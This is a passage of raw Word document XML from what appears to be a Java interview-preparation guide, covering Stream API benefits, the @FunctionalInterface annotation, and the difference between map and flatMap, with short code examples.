          <w:numId w:val="10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orEach (forEach())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Iterates through the elements of the stream and performs an action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFE476" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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stream.forEach(System.out::println)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C3ECF"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dvantages of Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31827107" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ise and readable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stream API allows you to write more concise, declarative code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436ED9C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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rallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Streams can be processed in parallel, making use of multi-core processors for performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A46723A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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azy evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Operations on streams are evaluated lazily, optimizing the process by reducing unnecessary computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99254F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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paration of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stream operations separate the logic of processing data from the logic of iterating over it, making code easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D394CD9"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5A45F221" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a modern way to process data in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866B8E6" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D03263" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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provides powerful operations like filter(), map(), reduce(), and collect(), and supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for improved performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929C9D7" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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tream API promotes cleaner, more readable, and maintainable code for working with collections and other data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABF3A4" w14:textId="603DCEAA" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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713735F">
          <v:rect id="_x0000_i1690" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1C423" w14:textId="77777777" w:rsidR="0066672F" w:rsidRPr="00CE4B95" w:rsidRDefault="0066672F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc196307703"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @FunctionalInterface annotation? Will it be checked manually or by the compiler?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="0760FAF7" w14:textId="6749FA8F" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">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FunctionalInterface annotation is used to indicate that an interface is intended to be a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface that has exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it can have multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E888277"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Points about @FunctionalInterface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4601D391" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Marks a Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The annotation tells the compiler that the interface is intended to be functional, i.e., it should have exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E2E54" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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iler Enforces the Rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you use @FunctionalInterface and the interface does not meet the criteria (having more than one abstract method, for example), the compiler will raise an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E41F63" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ptional but Recommended</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using @FunctionalInterface is optional, but it's recommended for clarity and to take advantage of compiler checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194EEC1" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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atibility with Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A functional interface can be used as the target type for lambda expressions or method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998617D"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Functional Interface with @FunctionalInterface annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0F085"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177FEC1"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interface MyFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374DCD2"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myMethod(); // Single abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654852A8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2297F1D7"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Default method (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2593C8"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efault void defaultMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA32EDB"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This is a default method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549612C"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B21B81D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A11649"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tatic method (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0E1FC"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atic void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A56DE"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This is a static method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F33FB7"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FE02ABF"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5D49E00"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Behavior of the @FunctionalInterface annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE642D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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iler Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you use @FunctionalInterface, the compiler checks if the interface indeed has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the interface has more than one abstract method, the compiler will give an error. This check is done </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the compiler at compile-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B160E0E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Manual Checks Needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You do not need to manually verify if the interface follows the rules of a functional interface. The compiler will handle it for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582604BA"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Compiler Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45904503"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB45E14"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interface InvalidFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A04E1"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method1(); // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9D686"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method2(); // Abstract method (violates functional interface rule)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7A1A7"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1616EBE"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e above code, you will get the following compile-time error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E23827" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B61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rror: InvalidFunctionalInterface is not a functional interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9114CB" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B61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4ED7ADC6" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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FunctionalInterface annotation helps make your intent clear and enables the compiler to validate whether the interface adheres to the rules of a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433272DA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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interface does not conform to the rules (i.e., more than one abstract method), the compiler will raise an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016CDA95" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked by the compiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at compile time, and you don't need to manually check it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C021E99" w14:textId="425F0EF5" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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B3604B2">
          <v:rect id="_x0000_i1691" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6297D" w14:textId="58DA95FD" w:rsidR="00D71256" w:rsidRPr="00CE4B95" w:rsidRDefault="00D71256">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_Toc196307704"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00755AEE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Map and FlatMap in stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w14:paraId="74FF54B9" w14:textId="025BED82" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">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Java Stream API, map and flatMap are both intermediate operations that transform data, but they are used in different contexts and behave differently. Here’s the detailed difference between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02622643" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A627EEE" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: map is used to transform each element of the stream into another form. It applies a function to each element of the stream and returns a new stream of the transformed values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC38D7" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It produces a stream of values that are the results of applying the given function to each element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D92C6" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ype of Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The transformation is 1-to-1, i.e., each input element produces exactly one output element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4783D" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845B2D8"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EAFDE2"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List&lt;Integer&gt; squaredNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A92DA"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n -&gt; n * n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480A78A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A813A6"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squaredNumbers);  // Output: [1, 4, 9, 16, 25]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2906C230"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e above example, each number is squared individually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03548116" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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flatMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8CDB5" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
